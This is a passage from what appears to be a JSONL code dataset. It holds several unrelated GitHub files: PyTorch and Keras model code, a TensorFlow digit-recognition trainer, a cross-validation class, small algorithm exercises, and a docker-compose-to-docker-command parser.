group['warmup'] > state['step']:\n scheduled_lr = 1e-8 + state['step'] * group['lr'] / group['warmup']\n else:\n scheduled_lr = group['lr']\n\n step_size = scheduled_lr * math.sqrt(bias_correction2) / bias_correction1\n\n if group['weight_decay'] != 0:\n 
p_data_fp32.add_(-group['weight_decay'] * scheduled_lr, p_data_fp32)\n\n p_data_fp32.addcdiv_(-step_size, exp_avg, denom)\n\n p.data.copy_(p_data_fp32)\n\n return loss\n\n\n\n\n\n\n\n","repo_name":"xiaoxiaokuaile/2022DCIC_OCR","sub_path":"MultiLabelSoftMargin_model/utils/optimizer/adamw.py","file_name":"adamw.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"81"} +{"seq_id":"19665314427","text":"from typing import Tuple\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n__all__ = [\"Projector\", \"Bias\", \"PositiveReal\"]\n\n\nclass Projector(nn.Module):\n def __init__(\n self,\n in_dim,\n out_dim,\n normalized=True,\n norm_type=2.0,\n weight=None,\n channel_last=False,\n ):\n super().__init__()\n if weight is None:\n weight = torch.randn(out_dim, in_dim)\n else:\n weight = weight.cpu()\n assert weight.size() == (out_dim, in_dim)\n self.weight = nn.Parameter(weight)\n self.in_dim = in_dim\n self.out_dim = out_dim\n self.normalized = normalized\n self.norm_type = norm_type\n self.channel_last = channel_last\n\n def _normalize(self, x):\n return F.normalize(input=x, dim=-1, p=self.norm_type)\n\n def forward(self, inputs):\n\n inputs = self._normalize(inputs)\n projectors = self._normalize(self.weight)\n\n if self.channel_last:\n outputs = torch.einsum(\"...i, oi -> ...o\", inputs, projectors)\n else:\n outputs = torch.einsum(\"bi..., oi -> bo...\", inputs, projectors)\n\n return outputs\n\n def extra_repr(self):\n\n out = []\n out.append(f\"in_dim={self.in_dim}\")\n out.append(f\"out_dim={self.out_dim}\")\n out.append(f\"normalized={self.normalized}\")\n out.append(f\"norm_type={self.norm_type}\")\n\n return \", \".join(out)\n\n\nclass Bias(nn.Module):\n def __init__(self, dims: Tuple[int], nonlinear: nn.Module = nn.Tanh):\n super().__init__()\n self.dims = dims\n self._bias = nn.Parameter(torch.zeros(dims))\n self.nonlinear = nonlinear()\n\n def forward(self):\n return self.nonlinear(self._bias)\n\n def extra_repr(self):\n\n out = []\n out.append(f\"dims={self.dims}\")\n out.append(f\"nonlinear={self.nonlinear.__class__.__name__}\")\n\n return \", \".join(out)\n\n\nclass PositiveReal(nn.Module):\n def __init__(self, initial_value=1.0):\n super().__init__()\n self._log_value = nn.Parameter(torch.tensor(initial_value).log())\n\n def forward(self):\n return self._log_value.exp()\n","repo_name":"chenchao-clarifai/segmentation-experiment","sub_path":"src/models/heads.py","file_name":"heads.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"1281905629","text":"'''\n문제 설명\n두 개의 단어 begin, target과 단어의 집합 words가 있습니다. 아래와 같은 규칙을 이용하여 begin���서 target으로 변환하는 가장 짧은 변환 과정을 찾으려고 합니다.\n\n1. 한 번에 한 개의 알파벳만 바꿀 수 있습니다.\n2. 
words에 있는 단어로만 변환할 수 있습니다.\n예를 들어 begin이 hit, target가 cog, words가 [hot,dot,dog,lot,log,cog]라면 hit -> hot -> dot -> dog -> cog와 같이 4단계를 거쳐 변환할 수 있습니다.\n\n두 개의 단어 begin, target과 단어의 집합 words가 매개변수로 주어질 때, 최소 몇 단계의 과정을 거쳐 begin을 target으로 변환할 수 있는지 return 하도록 solution 함수를 작성해주세요.\n\n제한사항\n각 단어는 알파벳 소문자로만 이루어져 있습니다.\n각 단어의 길이는 3 이상 10 이하이며 모든 단어의 길이는 같습니다.\nwords에는 3개 이상 50개 이하의 단어가 있으며 중복되는 단어는 없습니다.\nbegin과 target은 같지 않습니다.\n변환할 수 없는 경우에는 0를 return 합니다.\n입출력 예\nbegin\ttarget\twords\treturn\nhit\tcog\t[hot, dot, dog, lot, log, cog]\t4\nhit\tcog\t[hot, dot, dog, lot, log]\t0\n입출력 예 설명\n예제 #1\n문제에 나온 예와 같습니다.\n\n예제 #2\ntarget인 cog는 words 안에 없기 때문에 변환할 수 없습니다.\n'''\nbegin ='hit'\ntarget = 'cog'\nwords = ['hot', 'dot', 'dog', 'lot', 'log', 'cog']\nwords = ['hot', 'dot', 'dog', 'lot', 'log']\n\ndef check(begin, target):\n index = -1\n count = 0\n for i,(b,t) in enumerate(zip(begin,target)):\n if b != t:\n index = i\n count += 1\n if count > 1:\n return -1\n return index\n\ndef search(graph, begin, target, prev):\n temp = []\n for word in graph[begin]:\n if word in prev:\n continue\n elif word == target:\n return 1\n else:\n temp.append(1 + search(graph,word,target,prev+[word]))\n try:\n return min(temp)\n except ValueError:\n return float('inf')\n\ndef solution(begin, target, words):\n graph = {a:[ b for b in words if check(a, b) > -1 ] for a in words}\n graph[begin] = [ word for word in words if check(begin, word) > -1]\n\n answer = search(graph, begin, target, [begin])\n return 0 if answer == float('inf') else answer\n\nsolution(begin, target, words)\n\ngraph\n","repo_name":"LEE010/Algorithm","sub_path":"python3/programmers/BFS_DFS/단어변환.py","file_name":"단어변환.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13874185677","text":"import pandas as pd\n\nfrom sklearn.metrics import roc_auc_score\n\nfrom b2s_clf.experiments.experiment import Experiment\nfrom b2s_clf.utils import data_frame_utils as df_utils\n\n\nclass StratifiedCrossValidationExperiment(Experiment):\n \"\"\"\n A class that calls parent class Experiment to run a stratified cross-validation (SCV) experiment.The class works by\n reading a bunch of information stored in different dictionaries. Refer to /json_examples and library b2s_clf/apps/\n for specific information and templates on these dictionaries.\n \"\"\"\n\n def __init__(self, df, subject_dictionary, sampler_dictionary, ensemble_dictionary, transformer_dictionary):\n \"\"\"\n Class constructor. 
Calls parent class and sets additional arguments.\n\n Args:\n df: pandas.DataFrame containing signal data.\n subject_dictionary: Dict with subject data build information.\n sampler_dictionary: Dict with sampling instructions.\n ensemble_dictionary: Dict with ensemble build instructions.\n transformer_dictionary: Dict with data set transformation build\n \"\"\"\n super().__init__(df, subject_dictionary, sampler_dictionary, ensemble_dictionary, transformer_dictionary)\n self.experiment_type = \"STRATIFIED CV\"\n self.performance_method = \"_compute_scv_performance\"\n self.dataframe_method = \"_get_scv_data_frame\"\n\n def run(self, strata_variable, balanced_by, verbose=False):\n \"\"\"\n Calls b2s_clf.experiments.Experiment._run() with specific SCV parameters.\n\n Args:\n strata_variable: Strata or discrete variable used to build the SCV batches.\n balanced_by: A second binary variable to balance the SCV batches upon.\n verbose: Whether to print progress on screen.\n\n \"\"\"\n self.cv_dfs = df_utils.generate_leave_one_out_batch(signal_df=self.df, subjects_df=self.subject_df,\n subject_id_column=self.subject_column,\n strata_column=strata_variable,\n balanced_by=balanced_by)\n\n cv_batches = len(self.df[strata_variable].unique())\n self._run(cv_batches=cv_batches, verbose=verbose)\n\n def _compute_scv_performance(self, prd, prd_prb, df_val, df_fit):\n \"\"\"\n Specific way of computing experiment performance metrics.\n\n Args:\n prd: numpy.array with predictions.\n prd_prb: numpy.array with prediction probabilities.\n df_val: pandas.DataFrame with validation set.\n df_fit: pandas.DataFrame with training set.\n\n Returns:\n performance: A list with performance metrics for each iteration of the experiment.\n\n \"\"\"\n acc_score = (prd == df_val[self.target_variable]).mean()\n if len(df_val[self.target_variable].unique()) == 1:\n roc_score = acc_score\n else:\n roc_score = roc_auc_score(df_val[self.target_variable], prd_prb)\n\n performance = [acc_score,\n 1 - (prd[df_val[self.target_variable] == 0] == [0] * len(\n df_val[df_val[self.target_variable] == 0])).mean(),\n 1 - (prd[df_val[self.target_variable] == 1] == [1] * len(\n df_val[df_val[self.target_variable] == 1])).mean(),\n roc_score,\n len(df_val) / (len(df_val) + len(df_fit))]\n\n return performance\n\n @staticmethod\n def _get_scv_data_frame(scores):\n \"\"\"\n Transforms performance scores into a data frame.\n\n Args:\n scores: List with performance metrics for each iteration of the experiment.\n\n Returns:\n pandas.DataFrame with structured performance data.\n\n \"\"\"\n return pd.DataFrame(scores, columns=[\"accuracy\", \"FNR\", \"FPR\", \"ROC AUC score\", \"strata weight\"])\n","repo_name":"imanolmorata/biosignal_classifiers","sub_path":"b2s_clf/experiments/stratified_cross_validation.py","file_name":"stratified_cross_validation.py","file_ext":"py","file_size_in_byte":3995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"10573060721","text":"NUMFRAMES = 10\r\nNUMPINS = 10\r\n\r\nclass bowlingScore():\r\n \r\n def __init__(self):\r\n pass\r\n \r\n def getTotalScore(self,scoreString):\r\n self.__getScoreString(scoreString)\r\n self.__calcSingleFrameValueList(self.scoreString)\r\n return sum(self.scoreListValues)\r\n \r\n # Private methods\r\n def __getScoreString(self,scoreString):\r\n self.scoreString = scoreString\r\n \r\n def __getScoreList(self,scoreString):\r\n return scoreString.split(' ')\r\n \r\n def __interpSingleFrameValue(self, scoreSymbol):\r\n if scoreSymbol 
== 'X':\r\n scoreValue = ['strike',10,0]\r\n \r\n elif scoreSymbol.find('-')>0:\r\n scoreValue = ['',int(scoreSymbol[0]),0]\r\n \r\n elif scoreSymbol.find('/')>0:\r\n if len(scoreSymbol) == 2:\r\n scoreValue = ['spare',int(scoreSymbol[0]),NUMPINS-int(scoreSymbol[0])]\r\n else:\r\n scoreValue = ['spare',int(scoreSymbol[0]),NUMPINS-int(scoreSymbol[0]),int(scoreSymbol[2])]\r\n \r\n else:\r\n raise Exception('score symbol undefined!')\r\n \r\n return scoreValue\r\n \r\n def __calcSingleFrameValueList(self,scoreString):\r\n scoreList = self.__getScoreList(scoreString)\r\n lenScoreList = len(scoreList)\r\n scoreListValues = []\r\n for idx in range(NUMFRAMES):\r\n val = []\r\n val_1stNext = []\r\n val_2ndNext = []\r\n \r\n val = self.__interpSingleFrameValue(scoreList[idx])\r\n if val[0] == 'strike':\r\n val_1stNext = self.__interpSingleFrameValue(scoreList[idx+1])\r\n if val_1stNext[0] == 'strike':\r\n val_2ndNext = self.__interpSingleFrameValue(scoreList[idx+1])\r\n scoreListValues.append(val[1]+val_1stNext[1]+val_2ndNext[1])\r\n else:\r\n scoreListValues.append(val[1]+val_1stNext[1]+val_1stNext[2])\r\n \r\n elif val[0] == 'spare':\r\n if (idx+1)seuil]=255\n a[b<-seuil]=0\n return a\n\ndef convolution(input, taille_noyau, nbr_noyau, stride, b_norm=False, f_activation=None, training=False):\n w_filtre=tf.Variable(tf.random.truncated_normal(shape=(taille_noyau, taille_noyau, int(input.get_shape()[-1]), nbr_noyau)))\n b_filtre=np.zeros(nbr_noyau)\n result=tf.nn.conv2d(input, w_filtre, strides=[1, stride, stride, 1], padding='SAME')+b_filtre\n if b_norm is True:\n result=tf.layers.batch_normalization(result, training=training)\n if f_activation is not None:\n result=f_activation(result)\n return result\n \ndef fc(input, nbr_neurone, b_norm=False, f_activation=None, training=False):\n w=tf.Variable(tf.random.truncated_normal(shape=(int(input.get_shape()[-1]), nbr_neurone), dtype=tf.float32))\n b=tf.Variable(np.zeros(shape=(nbr_neurone)), dtype=tf.float32)\n result=tf.matmul(input, w)+b\n if b_norm is True:\n result=tf.layers.batch_normalization(result, training=training)\n if f_activation is not None:\n result=f_activation(result) \n return result\n\ndef ia(nbr_classes, size, couche, learning_rate=1E-3):\n ph_images=tf.placeholder(shape=(None, size, size, couche), dtype=tf.float32, name='entree')\n ph_labels=tf.placeholder(shape=(None, nbr_classes), dtype=tf.float32)\n ph_is_training=tf.placeholder_with_default(False, (), name='is_training')\n \n result=convolution(ph_images, 3, 64, 1, True, tf.nn.relu, ph_is_training)\n result=tf.layers.dropout(result, 0.3, training=ph_is_training)\n result=convolution(result, 3, 128, 1, True, tf.nn.relu, ph_is_training)\n result=tf.layers.dropout(result, 0.4, training=ph_is_training)\n result=tf.nn.max_pool(result, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\n result=tf.contrib.layers.flatten(result)\n \n result=fc(result, 128, True, tf.nn.relu, ph_is_training)\n result=tf.layers.dropout(result, 0.5, training=ph_is_training)\n result=fc(result, nbr_classes)\n socs=tf.nn.softmax(result, name=\"sortie\")\n \n loss=tf.nn.softmax_cross_entropy_with_logits_v2(labels=ph_labels, logits=result)\n extra_update_ops=tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(extra_update_ops):\n train=tf.train.AdamOptimizer(learning_rate).minimize(loss)\n accuracy=tf.reduce_mean(tf.cast(tf.equal(tf.argmax(socs, 1), tf.argmax(ph_labels, 1)), tf.float32))\n\n return ph_images, ph_labels, ph_is_training, socs, train, accuracy, 
tf.train.Saver()\n\ntab_images=[]\ntab_labels=[]\n\nfor dir in [\"/usr/share/fonts/truetype/ubuntu-font-family/\", \"/usr/share/fonts/truetype/freefont/\"]:\n for root, dirs, files in os.walk(dir):\n for file in files:\n if file.endswith(\"ttf\"):\n print(root+\"/\"+file)\n for i in range(1, 10):\n for cpt in range(nbr):\n image=Image.new(\"L\", (28, 28))\n draw=ImageDraw.Draw(image)\n font=ImageFont.truetype(root+\"/\"+file, np.random.randint(26, 32))\n text=\"{:d}\".format(i)\n draw.text((np.random.randint(1, 10), np.random.randint(-4, 0)), text, font=font, fill=(255))\n image=np.array(image).reshape(28, 28, 1)\n tab_images.append(image)\n tab_labels.append(np.eye(10)[i]) \n image_m=modif_image(image, 1.05+np.random.rand())\n tab_images.append(image_m)\n tab_labels.append(np.eye(10)[i])\n image=np.zeros((28, 28, 1))\n for cpt in range(3*nbr):\n image_m=modif_image(image, 1.05+np.random.rand())\n tab_images.append(image_m)\n tab_labels.append(np.eye(10)[0])\n \ntab_images=np.array(tab_images)\ntab_labels=np.array(tab_labels)\n\ntab_images=tab_images/255\n\ntab_images, tab_labels=shuffle(tab_images, tab_labels)\n\nif False: # Changer en True si vous voulez voir les images générées\n for i in range(len(tab_images)):\n cv2.imshow('chiffre', tab_images[i].reshape(28, 28, 1))\n print(tab_labels[i], np.argmax(tab_labels[i]))\n if cv2.waitKey()&0xFF==ord('q'):\n break\n\nprint(\"Nbr:\", len(tab_images))\n\ntrain_images, test_images, train_labels, test_labels=train_test_split(tab_images, tab_labels, test_size=0.10)\n\nimages, labels, is_training, sortie, train, accuracy, saver=ia(10, 28, 1)\n\nwith tf.Session() as s:\n s.run(tf.global_variables_initializer())\n tab_train=[]\n tab_test=[]\n for id_entrainement in np.arange(nbr_entrainement):\n print(\"> Entrainement\", id_entrainement)\n for batch in np.arange(0, len(train_images), taille_batch):\n s.run(train, feed_dict={\n images: train_images[batch:batch+taille_batch],\n labels: train_labels[batch:batch+taille_batch],\n is_training: True\n })\n print(\" entrainement OK\")\n tab_accuracy_train=[]\n for batch in np.arange(0, len(train_images), taille_batch):\n p=s.run(accuracy, feed_dict={\n images: train_images[batch:batch+taille_batch],\n labels: train_labels[batch:batch+taille_batch],\n is_training: True\n })\n tab_accuracy_train.append(p)\n print(\" train:\", np.mean(tab_accuracy_train))\n tab_accuracy_test=[]\n for batch in np.arange(0, len(test_images), taille_batch):\n p=s.run(accuracy, feed_dict={\n images: test_images[batch:batch+taille_batch],\n labels: test_labels[batch:batch+taille_batch],\n is_training: True\n })\n tab_accuracy_test.append(p)\n print(\" test :\", np.mean(tab_accuracy_test))\n tab_train.append(1-np.mean(tab_accuracy_train))\n tab_test.append(1-np.mean(tab_accuracy_test))\n saver.save(s, './mon_modele/modele')\n","repo_name":"L42Project/Tutoriels","sub_path":"Divers/tutoriel18-2/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6390,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"81"} +{"seq_id":"17892800798","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom keras.models import Model\nfrom keras.optimizers import Adam\nfrom keras.layers import Input, Dense, BatchNormalization, Activation\n\nfrom keras.datasets import mnist\n\nglobalSeed=56\nfrom numpy.random import seed\nseed(globalSeed)\nfrom tensorflow import 
set_random_seed\nset_random_seed(globalSeed)\n\n###############################################################################\n# General Plot Functions \n###############################################################################\n\n#Elimates the left and top lines and ticks in a matplotlib plot \ndef PlotStyle(Axes,Title):\n \n \"\"\"\n General plot style function\n \"\"\"\n \n Axes.spines['top'].set_visible(False)\n Axes.spines['right'].set_visible(False)\n Axes.spines['bottom'].set_visible(True)\n Axes.spines['left'].set_visible(True)\n Axes.xaxis.set_tick_params(labelsize=14)\n Axes.yaxis.set_tick_params(labelsize=14)\n Axes.set_title(Title)\n\n###############################################################################\n# Loading the dataset \n###############################################################################\n\n(Xtrain, Ytrain), (Xtest, Ytest) = mnist.load_data()\n\nXtrain = Xtrain.astype('float32') / 255.\nXtest = Xtest.astype('float32') / 255.\nXtrain = Xtrain.reshape((len(Xtrain), np.prod(Xtrain.shape[1:])))\nXtest = Xtest.reshape((len(Xtest), np.prod(Xtest.shape[1:])))\n\n###############################################################################\n# Vanilla Autoencoder \n###############################################################################\n# Modified from https://blog.keras.io/building-autoencoders-in-keras.html\n\n# this is the size of our encoded representations\nencoding_dim = 2\n\n# this is our input placeholder\ninput_img = Input(shape=(784,))\n# \"encoded\" is the encoded representation of the input\nencoded = Dense(encoding_dim, activation='relu')(input_img)\n# \"decoded\" is the lossy reconstruction of the input\ndecoded = Dense(784, activation='sigmoid')(encoded)\n\n# this model maps an input to its reconstruction\nautoencoder = Model(input_img, decoded)\n\nencoder = Model(input_img, encoded)\n\nencoded_input = Input(shape=(encoding_dim,))\n# retrieve the last layer of the autoencoder model\ndecoder_layer = autoencoder.layers[-1]\n# create the decoder model\ndecoder = Model(encoded_input, decoder_layer(encoded_input))\n\nautoencoder.compile(optimizer=Adam(lr=0.00025), loss='mse')\nautoencoder.fit(Xtrain, Xtrain,epochs=25,batch_size=256,shuffle=True)\n\nbaselinePerformance=autoencoder.evaluate(Xtest,Xtest)\n\n###############################################################################\n# Neural network generation\n###############################################################################\nlatent_dim=2\n\ndef MakeEncoder(InputFunction,EncoderArchitecture):\n \n \"\"\"\n Generates the encoder network using the functional API from keras \n Its Intended as a wrapper function for TrainAutoencoder \n \n InputFunction Input function from the keras functional API \n EncoderArchitecture A list with the number of dense units in the layer,\n the lenght of the list is the number of layers in the \n network \n \n \"\"\"\n \n inputEncoder=InputFunction\n \n en=Dense(EncoderArchitecture[0])(inputEncoder)\n en=Activation('relu')(en)\n \n for j in range(len(EncoderArchitecture)-1):\n \n en=Dense(EncoderArchitecture[j+1])(en)\n en=Activation('relu')(en)\n \n en=Dense(latent_dim)(inputEncoder)\n output=Activation('relu')(en)\n \n Encoder=Model(inputEncoder,output,name='Encoder')\n \n return Encoder\n\ndef MakeDecoder(InputFunction,EncoderArchitecture):\n \n \"\"\"\n Generates the decoder network using the functional API from keras \n Its Intended as a wrapper function for TrainAutoencoder \n \n InputFunction Input function from the keras 
functional API \n EncoderArchitecture A list with the number of dense units in the layer,\n the lenght of the list is the number of layers in the \n network \n \n \"\"\"\n \n inputDecoder=InputFunction\n reversedArchitecture=EncoderArchitecture[::-1]\n \n dec=Dense(reversedArchitecture[0])(inputDecoder)\n dec=Activation('relu')(dec)\n \n for k in range(len(reversedArchitecture)-1):\n \n dec=Dense(reversedArchitecture[k+1])(dec)\n dec=Activation('relu')(dec)\n \n dec=Dense(784)(dec)\n output=Activation('sigmoid')(dec)\n \n Decoder=Model(inputDecoder,output,name='Decoder')\n \n return Decoder\n\ndef TrainAutoencoder(Architecture,TrainData):\n \n \"\"\"\n Wrapper function to train the autoencoder network\n \n Architecture A list with the number of dense units in the layer,\n the lenght of the list is the number of layers in the \n network \n TrainData Data used to train the autoencoder network.\n \n \"\"\"\n \n inputEncoder=Input(shape=(784,),name='InputEncoder')\n inputDecoder=Input(shape=(latent_dim,),name='InputDecoder')\n Encoder=MakeEncoder(inputEncoder,Architecture)\n Decoder=MakeDecoder(inputDecoder,Architecture)\n output=Decoder(Encoder(inputEncoder))\n Autoencoder=Model(inputEncoder,output,name='Autoencoder')\n \n Autoencoder.summary()\n Autoencoder.compile(loss='mse',optimizer=Adam(lr=0.00025))\n Autoencoder.fit(TrainData,TrainData,batch_size=256,epochs=25,shuffle=True)\n \n return Encoder, Autoencoder\n\n###############################################################################\n# Tournament approach\n###############################################################################\n\ndef TournamentSearch(Population):\n \n \"\"\"\n \n Generates a population of candidate architectures, train an autoencoder\n and returns the performance of each candidate solution. 
\n \n Population Number of candidate architectures to be generated \n \n \"\"\"\n \n localPopulation=Population\n localBound=784\n \n archContainer=[]\n fitness=[]\n params=[]\n \n for k in range(localPopulation):\n \n randomDepth=np.random.randint(2,10)\n randomArchitecture=np.random.randint(2,localBound,size=randomDepth)\n randomArchitecture=list(np.sort(randomArchitecture))\n localArch=randomArchitecture[::-1]\n \n _,localAutoencoder=TrainAutoencoder(localArch,Xtrain)\n \n fitness.append(localAutoencoder.evaluate(Xtest,Xtest))\n params.append(localAutoencoder.count_params())\n \n archContainer.append(localArch)\n \n return archContainer,fitness,params\n\n###############################################################################\n# Tournament performance \n###############################################################################\n\narchs,performanceTournament,numberOfParams=TournamentSearch(50)\nmaxParams=np.max(numberOfParams)\n\nperformanceImprovement=[100*(1-(val/baselinePerformance)) for val in performanceTournament]\nparameterImprovement=[(val/maxParams) for val in numberOfParams]\n\nplt.figure(1,figsize=(10,10))\nplt.bar(np.arange(len(performanceImprovement)),performanceImprovement,parameterImprovement)\nplt.xlabel('Architectures',fontsize=24)\nplt.ylabel('Performance Improvement',fontsize=24)\nax=plt.gca()\nPlotStyle(ax,'')\n\n###############################################################################\n# Evolution approach\n###############################################################################\n \ndef MakeArchitectureMutations(NetworkArchitectures):\n \n \"\"\"\n \n Modify the candidate solutions and add new randomly generated candidate \n solutions \n \n NetworkArchitectures List of list with the best candidate solutions \n \n \"\"\"\n \n localNA=NetworkArchitectures\n localBound=784\n nArchs=len(localNA)\n mutatedArchs=[]\n \n for arch in localNA:\n \n archDepth=len(arch)\n randIndex=np.random.randint(0,archDepth)\n bufferArch=arch.copy()\n bufferArch[randIndex]=np.random.randint(2,localBound)\n mutatedArchs.append(bufferArch)\n \n for k in range(nArchs):\n \n randomDepth=np.random.randint(2,10)\n randomArchitecture=list(np.random.randint(2,localBound,size=randomDepth))\n mutatedArchs.append(randomArchitecture)\n \n return mutatedArchs\n \n\ndef NetworkEvolution(Generations,Population):\n \n \"\"\"\n \n Architecture optimization by evolutionary methods. \n \n Generation Number of iterations in the tournament search. 
\n Population Number of candidate architectures to be generated \n \n \"\"\"\n \n localGenerations=Generations\n localPopulation=Population\n \n archs,fitness,params=TournamentSearch(localPopulation)\n sortedIndex=np.argsort(np.array(fitness))\n selectedArchs=[archs[val] for val in sortedIndex[0:int(localPopulation/2)] ]\n \n bestArch=[archs[sortedIndex[0]]]\n bestFitness=[fitness[sortedIndex[0]]]\n bestParams=[params[sortedIndex[0]]]\n \n for k in range(localGenerations):\n \n archs=MakeArchitectureMutations(selectedArchs)\n fitness=[]\n params=[]\n \n for localArch in archs:\n \n _,localAutoencoder=TrainAutoencoder(localArch,Xtrain)\n fitness.append(localAutoencoder.evaluate(Xtest,Xtest))\n params.append(localAutoencoder.count_params())\n \n sortedIndex=np.argsort(np.array(fitness))\n \n bestArch.append(archs[sortedIndex[0]])\n bestFitness.append(fitness[sortedIndex[0]])\n bestParams.append(params[sortedIndex[0]])\n \n selectedArchs=[archs[val] for val in sortedIndex[0:int(localPopulation/2)] ]\n \n return bestArch,bestFitness,bestParams\n \n###############################################################################\n# Evolution performance \n###############################################################################\n\narchs1,performanceDE,numberOfParams1=NetworkEvolution(10,6)\nmaxParams1=np.max(numberOfParams1)\n\nperformanceImprovement1=[100*(1-(val/baselinePerformance)) for val in performanceDE]\nparameterImprovement1=[(val/maxParams1) for val in numberOfParams1]\n\nplt.figure(2,figsize=(10,10))\nplt.bar(np.arange(len(performanceImprovement1)),performanceImprovement1,parameterImprovement1)\nplt.xlabel('Architectures',fontsize=24)\nplt.ylabel('Performance Improvement',fontsize=24)\nax=plt.gca()\nPlotStyle(ax,'')\n","repo_name":"TavoGLC/DataAnalysisByExample","sub_path":"NeuralNetworks/Autoencoder.py","file_name":"Autoencoder.py","file_ext":"py","file_size_in_byte":10670,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"81"} +{"seq_id":"74175630983","text":"# -*- coding: utf-8 -*-\n\"\"\"This module creates the all the commands related to the services this includes building images, running the\nimages and connecting networks.\n\n.. 
_Google Python Style Guide:\n http://google.github.io/styleguide/pyguide.html\n\n\"\"\"\n\nfrom ..parser import Parser\nfrom .build import ServiceBuildParser\nfrom .networks import ServiceNetworkParser\n\n\nclass ServicesParser(Parser):\n \"\"\"This class converts service in docker-compose services into various docker commands.\n For example given the below yaml definition (docker-compose.yml).\n\n ::\n\n services:\n webapp:\n build:\n context: ./dir\n dockerfile: Dockerfile-alternate\n container_name: MyContainer\n networks:\n app_net:\n ipv4_address: 172.16.238.10\n\n Once parsed it will look something like:\n\n ::\n\n \"webapp\": {\n \"build\":{\n \"context\": \"./dir\",\n \"dockerfile\": \"Dockerfile-alternate\",\n },\n \"container_name\": MyContainer,\n \"networks\": {\n \"app_net\": {\n \"ipv4_address\": \"172.16.238.10\",\n }\n }\n },\n\n We generate the following command:\n\n ::\n\n docker build --file Dockerfile-alternate --tag composerisation_webapp ./dir\n docker run --name MyContainer --detach composerisation_webapp\n docker network connect --ip 172.16.238.10 app_net composerisation_webapp\n\n Following config options are ignored:\n\n - configs\n - credential_spec\n - depends_on\n - deploy\n - external_links\n - healthcheck\n - secrets\n - volume (long syntax)\n\n Args:\n service_name (str): The service name.\n service_options (dict): The service config options.\n\n \"\"\"\n\n def __init__(self, service_name: str, service_options: dict):\n args = {\n \"cap_add\": {\"type\": [list], \"name\": \"--cap-add\"},\n \"cap_drop\": {\"type\": [list], \"name\": \"--cap-drop\"},\n \"cgroup_parent\": {\"type\": [str], \"name\": \"--cgroup-parent\"},\n \"container_name\": {\"type\": [str], \"name\": \"--name\"},\n \"device\": {\"type\": [list], \"name\": \"--device\"},\n \"dns\": {\"type\": [list, str], \"name\": \"--dns\"},\n \"dns_search\": {\"type\": [list, str], \"name\": \"--dns-search\"},\n \"entrypoint\": {\"type\": [str], \"name\": \"--entrypoint\"},\n \"env_file\": {\"type\": [list, str], \"name\": \"--env-file\"},\n \"environment\": {\"type\": [list, dict], \"name\": \"--environment\"},\n \"expose\": {\"type\": [list], \"name\": \"--expose\"},\n \"extra_hosts\": {\"type\": [list], \"name\": \"--add-host\"},\n \"init\": {\"type\": [bool], \"name\": \"--init\"},\n \"isolation\": {\"type\": [str], \"name\": \"--isolation\"},\n \"labels\": {\"type\": [list], \"name\": \"--label\"},\n \"links\": {\"type\": [list], \"name\": \"--link\"},\n \"network_mode\": {\"type\": [str], \"name\": \"--network\"},\n \"pid\": {\"type\": [str], \"name\": \"--pid\"},\n \"ports\": {\"type\": [list], \"name\": \"--publish\"},\n \"restart\": {\"type\": [str], \"name\": \"--restart\"},\n \"security_opt\": {\"type\": [list], \"name\": \"--security-opt\"},\n \"stop_grace_period\": {\"type\": [str], \"name\": \"--stop-timeout\"},\n \"stop_signal\": {\"type\": [str], \"name\": \"--stop-signal\"},\n \"sysctls\": {\"type\": [list, dict], \"name\": \"--sysctl\"},\n \"tmpfs\": {\"type\": [list], \"name\": \"--tmpfs\"},\n \"userns_mode\": {\"type\": [str], \"name\": \"--userns\"},\n \"volumes\": {\"type\": [list], \"name\": \"--volume\"},\n }\n special_args = {\"ulimits\": self._parse_ulimits, \"logging\": self._parse_logging}\n ignore_args = [\n \"build\",\n \"command\",\n \"configs\",\n \"credential_spec\",\n \"depends_on\",\n \"deploy\",\n \"external_links\",\n \"healthcheck\",\n \"networks\",\n \"image\",\n \"secrets\",\n ]\n super().__init__(\n args=args,\n config_name=service_name,\n 
config_options=service_options,\n special_args=special_args,\n ignore_args=ignore_args,\n )\n\n def get_start_command(self) -> list:\n \"\"\"This function returns a list of all the commands you will need to recreate the docker-compose service\n using the docker cli. Each item in the list is a docker command you can run. They should be in the\n order they are presented in, for example you need to build a container before you can run it.\n\n For each service you will always get a `docker run` command you may also get a `docker build` and a\n `docker network` depending on what config options are set within that service (build/networking).\n\n Returns:\n list: A list of commands required by the services this includes `docker build`, `docker run` and \\\n `docker network connect`.\n\n \"\"\"\n service_commands = []\n image_name = self._get_image_name()\n container_name = self._get_container_name()\n\n if \"build\" in self.config_options:\n build_config = self.config_options[\"build\"]\n build = ServiceBuildParser(service_name=image_name, build_config=build_config)\n build_command = build.get_command()\n service_commands.append(build_command)\n\n run_command = self._add_run_command(container_name, image_name)\n service_commands.append(run_command)\n\n if \"networks\" in self.config_options:\n networks_config = self.config_options[\"networks\"]\n for name, config in networks_config.items():\n network = ServiceNetworkParser(service_name=container_name, network_name=name, network_config=config)\n network_command = network.get_command()\n service_commands.append(network_command)\n return service_commands\n\n def _add_run_command(self, container_name: str, image_name: str) -> str:\n \"\"\"This function will get the equivalent `docker run` command for a given service config in docker compose.\n Including the args required. If a name is not specified the container will be named after the service.\n\n Args:\n container_name (str): What to call the container once it's running.\n image_name (str): The name of the image we will run.\n\n Returns:\n str: The `docker run` commands for the given `service_options`. This will start our docker image and run \\\n it.\n\n \"\"\"\n args = self._get_args()\n if \"container_name\" not in self.config_options:\n args += f\" --name {container_name}\"\n\n command = self.config_options.get(\"command\", \"\")\n if isinstance(command, list):\n command = \" \".join(command)\n command = f'\"{command}\"'\n\n run_command = f\"docker run {args} --detach {image_name} 